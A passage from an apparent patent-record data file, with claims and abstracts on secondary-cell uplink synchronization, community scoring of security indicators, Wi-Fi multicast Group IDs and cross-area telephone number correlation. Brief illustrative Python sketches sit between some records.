identifying different preambles reserved by the PDCCH order signaling for different secondary cells to determine the secondary cells for uplink synchronization; or identifying a field of CIF in the PDCCH order signaling to determine the secondary cells for uplink synchronization; or determining, based on the PDCCH order signaling, whether to perform uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 4. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether to perform the uplink synchronization with the base station in the secondary cell based on the RRC configuration request. 5. The method according to claim 1, further comprising:
determining whether a dedicated preamble has been set in the RRC configuration request; in response to determining that a dedicated preamble has been set, performing a non-contention uplink synchronization process; and in response to determining that no dedicated preamble has been set, performing a contention uplink synchronization process. 6. The method according to claim 1, further comprising:
sending to the base station a message that a RRC configuration is completed, wherein the message is sent independent of performing the uplink synchronization. 7. The method according to claim 1, further comprising:
after performing the uplink synchronization, sending to the base station a message that a RRC configuration is completed. 8. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining, based on the RRC configuration request, whether to use Timing Advance TA information of a secondary cell or primary cell which has been configured; and in response to determining not to use Timing Advance TA information of a secondary cell which has been configured, performing a random access process for the secondary cell. 9. The method according to claim 1, wherein performing uplink synchronization with the base station in the secondary cell comprises:
determining whether it is necessary to configure a plurality of secondary cells based on the RRC configuration request; in response to determining that it is necessary to configure a plurality of secondary cells, determining whether the same TA information is used for the plurality of secondary cells; if the same TA information is used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells, and obtaining TA information based on the first successfully-performed random access process for use in uplink transmission of each secondary cell; and if the same TA information is not used for the plurality of secondary cells, performing random access processes simultaneously or one by one for each of the plurality of secondary cells to obtain TA information corresponding to each secondary cell for use in uplink transmission of the each secondary cell. 10. The method according to claim 1, wherein after receiving the RRC configuration request, if a user equipment fails to perform uplink synchronization with the base station in the secondary cell or the uplink synchronization fails, contents for the secondary cell in cell active MAC signaling are ignored and/or downlink measurement and report for the secondary cell are not performed. 11. A method for initializing a secondary cell in a cellular communication system, comprising:
sending to a user equipment a Radio Resource Control RRC configuration request so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 12. The method according to claim 11, further comprising:
sending to the user equipment a PDCCH order signaling so that the uplink synchronization between the user equipment and the base station in the secondary cell is performed. 13. The method according to claim 11, wherein sending to the user equipment a PDCCH order signaling comprises:
reserving different preambles in the PDCCH order signaling for different secondary cells to identify a secondary cell to perform the uplink synchronization; or setting a field of CIF in the PDCCH order signaling to identify the secondary cells for uplink synchronization; or setting the PDCCH order signaling to indicate whether to perform the uplink synchronization merely for specific secondary cells or for all secondary cells that have not performed the uplink synchronization. 14.-19. (canceled) 20. A user equipment for initializing a secondary cell in a cellular communication system, comprising:
receiving means configured to receive from a base station a Radio Resource Control RRC configuration request for the secondary cell to perform the RRC configuration; and synchronizing means configured to perform, in response to receiving the RRC configuration request, uplink synchronization with the base station in the secondary cell. 21.-29. (canceled) 30. A base station for initializing a secondary cell in a cellular communication system, comprising sending means, wherein the sending means comprises:
an RRC configuration request sending unit configured to send a Radio Resource Control RRC configuration request to a user equipment so that the user equipment performs a RRC configuration and performs uplink synchronization between the user equipment and a base station in the secondary cell. 31.-38. (canceled) | 2,400 |
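Claim 5 of the record above specifies a branch the UE takes when initializing the secondary cell: a dedicated preamble present in the RRC configuration request selects the non-contention uplink synchronization process, and its absence selects the contention-based process. A brief sketch of that decision, with a hypothetical dict-based request representation (not a real 3GPP data structure):

```python
# Illustrative sketch of the claim-5 branch: the presence of a dedicated
# preamble in the RRC configuration request decides between non-contention
# and contention-based uplink synchronization. Field names are assumptions.

def choose_uplink_sync_procedure(rrc_config_request):
    """Return which uplink synchronization process the UE performs."""
    if rrc_config_request.get("dedicated_preamble") is not None:
        return "non-contention"
    return "contention"

assert choose_uplink_sync_procedure({"dedicated_preamble": 42}) == "non-contention"
assert choose_uplink_sync_procedure({}) == "contention"
```

Claim 9 extends the same configuration request with a further decision (whether several secondary cells share one Timing Advance value), but the preamble check above is the core contention/non-contention split.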
9,174 | 9,174 | 15,545,099 | 2,438 | Examples relate to collaborative investigation of security indicators. The examples disclosed herein enable presenting, via a user interface, community-based threat information associated with a security indicator to a user. The community-based threat information may comprise investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results. The examples further enable obtaining an investigation result from the user and updating the indicator score based on the investigation result. | 1. A method for collaborative investigation of security indicators, the method comprising:
presenting, via a user interface, community-based threat information associated with a security indicator to a user, the community-based threat information comprising investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results; obtaining an investigation result from the user; and updating the indicator score based on the investigation result. 2. The method of claim 1, wherein the community-based threat information comprises information related to the community of users and information related to the security indicator. 3. The method of claim 2, further comprising:
receiving, via the user interface, an indication that the security indicator is under investigation by the user; and updating the investigation status based on the indication that the security indicator is under investigation by the user. 4. The method of claim 1, further comprising:
detecting when event data includes an event that matches at least one security indicator of a blacklist; and generating a security alert based on the detection. 5. The method of claim 4, further comprising:
determining whether to remove the security indicator from the blacklist based on the indicator score. 6. The method of claim 4, further comprising:
adding the investigation result to the community-based threat information; and updating the indicator score based on at least one parameter, the at least one parameter comprising the total number of the investigation results, the number of the investigation results indicating that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 7. A non-transitory machine-readable storage medium comprising instructions executable by a processor of a computing device for collaborative investigation of security indicators, the machine-readable storage medium comprising:
instructions to cause a display of community-based threat information associated with a security indicator, the community-based threat information comprising a collaborative set of investigation results that is obtained from a plurality of users for the security indicator and an indicator score; instructions to obtain an investigation result indicating whether the security indicator is malicious; instructions to include the investigation result in the collaborative set; and instructions to determine the indicator score based on at least one parameter, the at least one parameter comprising the number of the investigation results in the collaborative set that indicate that the security indicator is malicious. 8. The non-transitory machine-readable storage medium of claim 7, wherein the at least one parameter comprises the total number of the investigation results in the collaborative set, information related to the plurality of users, and information related to the security indicator. 9. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to determine whether event data includes an event that corresponds to the security indicator of a blacklist; and in response to determining that the event data includes the event that corresponds to the security indicator of the blacklist, instructions to generate a security alert. 10. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the indicator score with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 11. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the total number of the investigation results in the collaborative set with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 12. A system for collaborative investigation of security indicators comprising:
a processor that: generates a security alert based on a detection of a security indicator in event data, wherein a blacklist comprises a plurality of security indicators; in response to the security alert, obtains community-based threat information associated with the security indicator, the community-based threat information comprising a plurality of investigation results that are obtained from a plurality of users for the security indicator and an indicator score that is determined based on the plurality of investigation results; obtains a new investigation result from a user, the new investigation result indicating whether the security indicator is malicious; modifies the indicator score based on the new investigation result; and determines whether to remove the security indicator from the blacklist based on the indicator score. 13. The system of claim 12, the processor that:
determines the indicator score based on at least one parameter, the at least one parameter comprising the total number of the plurality of investigation results, the number of the investigation results in the plurality of investigation results that indicate that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 14. The system of claim 12, the processor that:
determines whether a change to the community-based threat information occurs; and in response to determining that the change to the community-based threat information occurs, generates a notification that informs at least one of the plurality of users of the change. 15. The system of claim 12, the processor that:
determines a user score associated with the user based on at least one investigation result that the user has previously submitted; and determines the indicator score based on the user score. | Examples relate to collaborative investigation of security indicators. The examples disclosed herein enable presenting, via a user interface, community-based threat information associated with a security indicator to a user. The community-based threat information may comprise investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results. The examples further enable obtaining an investigation result from the user and updating the indicator score based on the investigation result.1. A method for collaborative investigation of security indicators, the method comprising:
presenting, via a user interface, community-based threat information associated with a security indicator to a user, the community-based threat information comprising investigation results that are obtained from a community of users for the security indicator, and an indicator score that is determined based on the investigation results; obtaining an investigation result from the user; and updating the indicator score based on the investigation result. 2. The method of claim 1, wherein the community-based threat information comprises information related to the community of users and information related to the security indicator. 3. The method of claim 2, further comprising:
receiving, via the user interface, an indication that the security indicator is under investigation by the user; and updating the investigation status based on the indication that the security indicator is under investigation by the user. 4. The method of claim 1, further comprising:
detecting when event data includes an event that matches at least one security indicator of a blacklist; and generating a security alert based on the detection. 5. The method of claim 4, further comprising:
determining whether to remove the security indicator from the blacklist based on the indicator score. 6. The method of claim 4, further comprising:
adding the investigation result to the community-based threat information; and updating the indicator score based on at least one parameter, the at least one parameter comprising the total number of the investigation results, the number of the investigation results indicating that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 7. A non-transitory machine-readable storage medium comprising instructions executable by a processor of a computing device for collaborative investigation of security indicators, the machine-readable storage medium comprising:
instructions to cause a display of community-based threat information associated with a security indicator, the community-based threat information comprising a collaborative set of investigation results that is obtained from a plurality of users for the security indicator and an indicator score; instructions to obtain an investigation result indicating whether the security indicator is malicious; instructions to include the investigation result in the collaborative set; and instructions to determine the indicator score based on at least one parameter, the at least one parameter comprising the number of the investigation results in the collaborative set that indicate that the security indicator is malicious. 8. The non-transitory machine-readable storage medium of claim 7, wherein the at least one parameter comprises the total number of the investigation results in the collaborative set, information related to the plurality of users, and information related to the security indicator. 9. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to determine whether event data includes an event that corresponds to the security indicator of a blacklist; and in response to determining that the event data includes the event that corresponds to the security indicator of the blacklist, instructions to generate a security alert. 10. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the indicator score with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 11. The non-transitory machine-readable storage medium of claim 7, further comprising:
instructions to compare the total number of the investigation results in the collaborative set with a threshold; and instructions to exclude the security indicator from a blacklist based on the comparison. 12. A system for collaborative investigation of security indicators comprising:
a processor that: generates a security alert based on a detection of a security indicator in event data, wherein a blacklist comprises a plurality of security indicators; in response to the security alert, obtains community-based threat information associated with the security indicator, the community-based threat information comprising a plurality of investigation results that are obtained from a plurality of users for the security indicator and an indicator score that is determined based on the plurality of investigation results; obtains a new investigation result from a user, the new investigation result indicating whether the security indicator is malicious; modifies the indicator score based on the new investigation result; and determines whether to remove the security indicator from the blacklist based on the indicator score. 13. The system of claim 12, the processor that:
determines the indicator score based on at least one parameter, the at least one parameter comprising the total number of the plurality of investigation results, the number of the investigation results in the plurality of investigation results that indicate that the security indicator is malicious, information related to the community of users, and information related to the security indicator. 14. The system of claim 12, the processor that:
determines whether a change to the community-based threat information occurs; and in response to determining that the change to the community-based threat information occurs, generates a notification that informs at least one of the plurality of users of the change. 15. The system of claim 12, the processor that:
determines a user score associated with the user based on at least one investigation result that the user has previously submitted; and determines the indicator score based on the user score. | 2,400 |
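The security-indicator record above repeatedly ties an indicator score to the collaborative set of investigation results (claims 6-7) and removes an indicator from the blacklist based on that score (claim 12). One simple scoring function consistent with those claims is the malicious fraction of the result set; the claims do not fix a formula, so this weighting and the 0.5 threshold are assumptions for illustration only.

```python
# Hedged sketch of the claims-6/7/12 scoring idea: the indicator score is
# the fraction of investigation results flagging the indicator as malicious,
# and a threshold comparison decides blacklist removal. Formula is assumed.

def update_indicator_score(results):
    """results: list of booleans, True meaning a 'malicious' verdict."""
    if not results:
        return 0.0
    malicious = sum(1 for verdict in results if verdict)
    return malicious / len(results)

def should_remove_from_blacklist(score, threshold=0.5):
    """Claim 12: remove the indicator when its score falls below a threshold."""
    return score < threshold

score = update_indicator_score([True, False, True, True])  # 3 of 4 malicious
assert abs(score - 0.75) < 1e-9
assert not should_remove_from_blacklist(score)
assert should_remove_from_blacklist(update_indicator_score([False, False, True]))
```

Claim 15 additionally weights results by a per-user score derived from a user's past submissions; that would replace the uniform count above with a weighted sum, but the threshold comparison stays the same.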
9,175 | 9,175 | 15,710,708 | 2,477 | Methods and apparatus for transmission of data streams using a multicast packet format based on group identifiers (Group IDs) to deliver data to multiple recipient stations (STAs). Using Group IDs, an access point (AP) assigns multiple STAs to one or more groups, and uniquely assigns each STA to a particular position within the group, such that it can receive a requested data stream. A Group ID management action frame provided by the AP to an individual STA indicates to which group (or groups) the STA is assigned and the STA's position within the group, with which information the STA can determine whether a packet is intended for the STA and which portion of the packet to decode in order to receive requested data streams. | 1. A method for multicast transmission from a wireless access point (AP) to a plurality of wireless stations (STAs), the method comprising:
by the wireless AP: providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission; receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams; sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one or more Group IDs, the Group ID corresponding to the data stream; and transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 2. The method of claim 1, further comprising:
by the wireless AP: receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 3. The method of claim 1, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 4. The method of claim 1, wherein the data messages comprise very high transmission (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 5. The method of claim 1, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission by the wireless AP. 6. The method of claim 1, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 7. The method of claim 1, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 8. The method of claim 7, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 9. The method of claim 1, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 10. 
A wireless access point (AP) configurable for multicast transmission to a plurality of wireless stations (STAs), the wireless AP comprising:
wireless circuitry communicatively coupled to a plurality of antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission;
receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams;
sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one or more Group IDs, the Group ID corresponding to the data stream; and
transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 11. The wireless AP of claim 10, wherein execution of the instructions further causes the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 12. The wireless AP of claim 10, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 13. The wireless AP of claim 10, wherein the data messages comprise very high transmission (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 14. The wireless AP of claim 10, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission use by the wireless AP. 15. The wireless AP of claim 10, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 16. The wireless AP of claim 10, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 17. The wireless AP of claim 16, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 18. 
The wireless AP of claim 10, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 19. A wireless station (STA) configurable for receiving multicast transmission from a wireless access point (AP), the wireless STA comprising:
wireless circuitry communicatively coupled to one or more antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless STA to receive multicast transmissions from the wireless AP by at least:
receiving from the wireless AP an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmissions;
sending a request to the wireless AP to receive a data stream of the plurality of data streams;
receiving from the wireless AP a management message that assigns the wireless STA to a Group ID of the one or more Group IDs, the Group ID corresponding to the data stream; and
receiving from the wireless AP the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 20. The wireless STA of claim 19, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. | Methods and apparatus for transmission of data streams using a multicast packet format based on group identifiers (Group IDs) to deliver data to multiple recipient stations (STAs). Using Group IDs, an access point (AP) assigns multiple STAs to one or more groups, and uniquely assigns each STA to a particular position within the group, such that it can receive a requested data stream. A Group ID management action frame provided by the AP to an individual STA indicates to which group (or groups) the STA is assigned and the STA's position within the group, with which information the STA can determine whether a packet is intended for the STA and which portion of the packet to decode in order to receive requested data streams. 1. A method for multicast transmission from a wireless access point (AP) to a plurality of wireless stations (STAs), the method comprising:
by the wireless AP: providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission; receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams; sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one or more Group IDs, the Group ID corresponding to the data stream; and transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 2. The method of claim 1, further comprising:
by the wireless AP: receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 3. The method of claim 1, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 4. The method of claim 1, wherein the data messages comprise very high throughput (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 5. The method of claim 1, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission by the wireless AP. 6. The method of claim 1, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 7. The method of claim 1, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 8. The method of claim 7, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 9. The method of claim 1, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 10. 
A wireless access point (AP) configurable for multicast transmission to a plurality of wireless stations (STAs), the wireless AP comprising:
wireless circuitry communicatively coupled to a plurality of antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
providing to the plurality of wireless STAs an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmission;
receiving a request from a wireless STA of the plurality of wireless STAs to receive a data stream of the plurality of data streams;
sending to the wireless STA a management message that assigns the wireless STA to a Group ID of the one or more Group IDs, the Group ID corresponding to the data stream; and
transmitting to the plurality of wireless STAs the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 11. The wireless AP of claim 10, wherein execution of the instructions further causes the wireless AP to send multicast transmissions to a plurality of wireless stations (STAs) by at least:
receiving a second request from a second wireless STA of the plurality of wireless STAs to receive the data stream; and sending to the second wireless STA a second management message that assigns the second wireless STA to the Group ID, wherein both the wireless STA and the second wireless STA receive the data stream via the same data messages. 12. The wireless AP of claim 10, wherein the management message comprises a management action frame formatted in accordance with an 802.11 wireless communication protocol. 13. The wireless AP of claim 10, wherein the data messages comprise very high throughput (VHT) physical layer convergence protocol (PLCP) protocol data units (PDUs) that include multiple media access control (MAC) layer PDUs. 14. The wireless AP of claim 10, wherein the one or more Group IDs for multicast transmission comprise a set of Group ID values assigned only for multicast transmission use by the wireless AP. 15. The wireless AP of claim 10, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. 16. The wireless AP of claim 10, wherein each data stream of the plurality of data streams is associated with a different radio frequency channel of a radio frequency band, wherein the radio frequency band is associated with the Group ID. 17. The wireless AP of claim 16, wherein each radio frequency channel of the radio frequency band is associated with a distinct group position for the Group ID. 18. 
The wireless AP of claim 10, wherein at least one data stream of the plurality of data streams is associated with a plurality of radio frequency channels of a radio frequency band, wherein the radio frequency band is associated with the Group ID and the plurality of radio frequency channels are communicated in parallel using carrier aggregation. 19. A wireless station (STA) configurable for receiving multicast transmission from a wireless access point (AP), the wireless STA comprising:
wireless circuitry communicatively coupled to one or more antennas; one or more processors communicatively coupled to the wireless circuitry; and a memory communicatively coupled to the one or more processors and storing instructions that, when executed by the one or more processors, cause the wireless STA to receive multicast transmissions from the wireless AP by at least:
receiving from the wireless AP an association of a plurality of data streams with one or more Group Identifiers (IDs) for multicast transmissions;
sending a request to the wireless AP to receive a data stream of the plurality of data streams;
receiving from the wireless AP a management message that assigns the wireless STA to a Group ID of the one or more Group IDs, the Group ID corresponding to the data stream; and
receiving from the wireless AP the data stream using data messages that include multiple data streams aggregated together based on the one or more Group IDs. 20. The wireless STA of claim 19, wherein the management message that assigns the wireless STA to the Group ID further assigns the wireless STA to a group position within a group of data streams that share the Group ID, where the group position indicates data associated with the data stream requested by the wireless STA. | 2,400 |
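The Group ID scheme claimed above (the AP associates streams with multicast-only Group IDs, answers a STA's request with a management message carrying a Group ID plus a group position, and aggregates streams into shared data messages that every assigned STA receives) can be sketched roughly as follows. This is a minimal illustration under stated assumptions only: the class, method, and message-field names are invented for the sketch and do not come from the patent or from any real 802.11 implementation.

```python
class GroupIdManager:
    """AP-side bookkeeping (hypothetical): maps each multicast data stream
    to a (group_id, group_position) pair and records STA assignments."""

    def __init__(self, multicast_group_ids):
        # Group ID values reserved only for multicast use (claims 5/14).
        self.multicast_group_ids = list(multicast_group_ids)
        self.stream_map = {}    # stream name -> (group_id, position)
        self.assignments = {}   # sta -> set of (group_id, position)

    def register_stream(self, stream, group_id, position):
        # Each stream gets a Group ID and a distinct position within
        # the group of streams sharing that Group ID (claims 6/15).
        assert group_id in self.multicast_group_ids
        self.stream_map[stream] = (group_id, position)

    def handle_request(self, sta, stream):
        """STA requests a stream; the AP replies with a management
        message assigning the STA to that stream's Group ID/position."""
        group_id, position = self.stream_map[stream]
        self.assignments.setdefault(sta, set()).add((group_id, position))
        return {"type": "mgmt", "sta": sta,
                "group_id": group_id, "group_position": position}


def positions_to_decode(assignment_set, packet_group_id):
    """STA-side check: decode a data message only if its Group ID matches
    an assignment; the position selects which aggregated stream to keep."""
    return [pos for gid, pos in assignment_set if gid == packet_group_id]
```

Two STAs requesting the same stream receive the same (Group ID, position) pair, so both extract the stream from the same aggregated data messages, mirroring claims 2 and 11.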
9,176 | 9,176 | 13,244,872 | 2,468 | An IP telephony system allows users of the IP telephony system to register extension telephony devices with the IP telephony system. An extension telephony device is one that is provided with service by a separate telephony service provider. Once an extension telephony device is registered, a user can obtain communications services from the IP telephony system using the extension telephony device. An extension telephony device may be tied to a user's main telephony services account with the IP telephony system such that when the user obtains communications services from the IP telephony system using an extension telephony device, the user will be billed for those communications services through the user's main account. | 1. A method of creating a correlation between telephone numbers associated with different geographical areas, comprising:
receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and informing the telephony device of the first telephone number. 2. The method of claim 1, wherein the receiving step comprises receiving the request from a software application running on the telephony device. 3. The method of claim 2, wherein the informing step comprises informing the software application running on the telephony device of the first telephone number. 4. The method of claim 1, wherein the receiving step also comprises receiving an identity of a party that is reachable at the second telephone number. 5. The method of claim 4, wherein the informing step comprises initiating a telephone call to the telephony device, where caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 6. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
means for receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; means for assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and means for informing the telephony device of the first telephone number. 7. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
a receiving unit that receives from a telephony device a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; an assignment unit that assigns a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and an informing unit that informs the telephony device of the first telephone number. 8. The system of claim 7, wherein the receiving unit receives the request from a software application running on the telephony device. 9. The system of claim 8, wherein the informing unit informs the software application running on the telephony device of the first telephone number. 10. The system of claim 7, wherein the receiving unit also receives an identity of a party that is reachable at the second telephone number. 11. The system of claim 10, wherein the informing unit initiates a telephone call to the telephony device, and wherein caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 12. A method of correlating telephone numbers associated with different geographical areas, comprising:
sending, from a telephony device, a request for a telephone number associated with a first geographical area to be correlated to a telephone number associated with a second geographical area, wherein the request includes the telephone number associated with the second geographical area and an identity of a party that is reachable at that number; receiving an incoming telephone call at the telephony device, wherein the incoming telephone call includes caller ID information that indicates the telephone number associated with the first geographical area and the identity of the party that is reachable at the telephone number associated with the second geographical area. 13. The method of claim 12, further comprising causing the telephone number included in the caller ID of the received incoming telephone call to be stored in a contact list on the telephony device against the identity of the party reachable at the telephone number associated with the second geographical area. | An IP telephony system allows users of the IP telephony system to register extension telephony devices with the IP telephony system. An extension telephony device is one that is provided with service by a separate telephony service provider. Once an extension telephony device is registered, a user can obtain communications services from the IP telephony system using the extension telephony device. An extension telephony device may be tied to a user's main telephony services account with the IP telephony system such that when the user obtains communications services from the IP telephony system using an extension telephony device, the user will be billed for those communications services through the user's main account. 1. A method of creating a correlation between telephone numbers associated with different geographical areas, comprising:
receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and informing the telephony device of the first telephone number. 2. The method of claim 1, wherein the receiving step comprises receiving the request from a software application running on the telephony device. 3. The method of claim 2, wherein the informing step comprises informing the software application running on the telephony device of the first telephone number. 4. The method of claim 1, wherein the receiving step also comprises receiving an identity of a party that is reachable at the second telephone number. 5. The method of claim 4, wherein the informing step comprises initiating a telephone call to the telephony device, where caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 6. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
means for receiving, from a telephony device, a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; means for assigning a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and means for informing the telephony device of the first telephone number. 7. A system for creating a correlation between telephone numbers associated with different geographical areas, comprising:
a receiving unit that receives from a telephony device a request for the assignment of a telephone number associated with a first geographical area that is to correspond to a telephone number associated with a second geographical area; an assignment unit that assigns a first telephone number associated with the first geographical area to a second telephone number associated with the second geographical area, where the first telephone number can subsequently be used to connect telephony communications to the second telephone number; and an informing unit that informs the telephony device of the first telephone number. 8. The system of claim 7, wherein the receiving unit receives the request from a software application running on the telephony device. 9. The system of claim 8, wherein the informing unit informs the software application running on the telephony device of the first telephone number. 10. The system of claim 7, wherein the receiving unit also receives an identity of a party that is reachable at the second telephone number. 11. The system of claim 10, wherein the informing unit initiates a telephone call to the telephony device, and wherein caller ID information for the telephone call includes the assigned first telephone number and the identity of the party reachable at the second telephone number. 12. A method of correlating telephone numbers associated with different geographical areas, comprising:
sending, from a telephony device, a request for a telephone number associated with a first geographical area to be correlated to a telephone number associated with a second geographical area, wherein the request includes the telephone number associated with the second geographical area and an identity of a party that is reachable at that number; receiving an incoming telephone call at the telephony device, wherein the incoming telephone call includes caller ID information that indicates the telephone number associated with the first geographical area and the identity of the party that is reachable at the telephone number associated with the second geographical area. 13. The method of claim 12, further comprising causing the telephone number included in the caller ID of the received incoming telephone call to be stored in a contact list on the telephony device against the identity of the party reachable at the telephone number associated with the second geographical area. | 2,400 |
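Claims 1-5 and 12-13 above describe a server that assigns a telephone number in one geographical area, correlates it with a number in another area, and later connects calls placed to the first number through to the second. The server-side bookkeeping might look like the sketch below; every class, method, and number used here is hypothetical and only illustrates the claimed flow.

```python
class NumberCorrelator:
    """Illustrative server-side state for correlating a first-area
    telephone number with a second-area telephone number."""

    def __init__(self, pools):
        # pools: geographical area -> list of unassigned local numbers
        self.pools = {area: list(nums) for area, nums in pools.items()}
        self.forwarding = {}  # assigned first number -> second number
        self.identity = {}    # assigned first number -> party identity

    def assign(self, first_area, second_number, party_identity=None):
        """Claim 1: pick a first-area number, correlate it with the
        second-area number, and return it so the device can be informed."""
        first_number = self.pools[first_area].pop(0)
        self.forwarding[first_number] = second_number
        if party_identity is not None:   # claim 4: optional identity
            self.identity[first_number] = party_identity
        return first_number

    def route(self, dialed_number):
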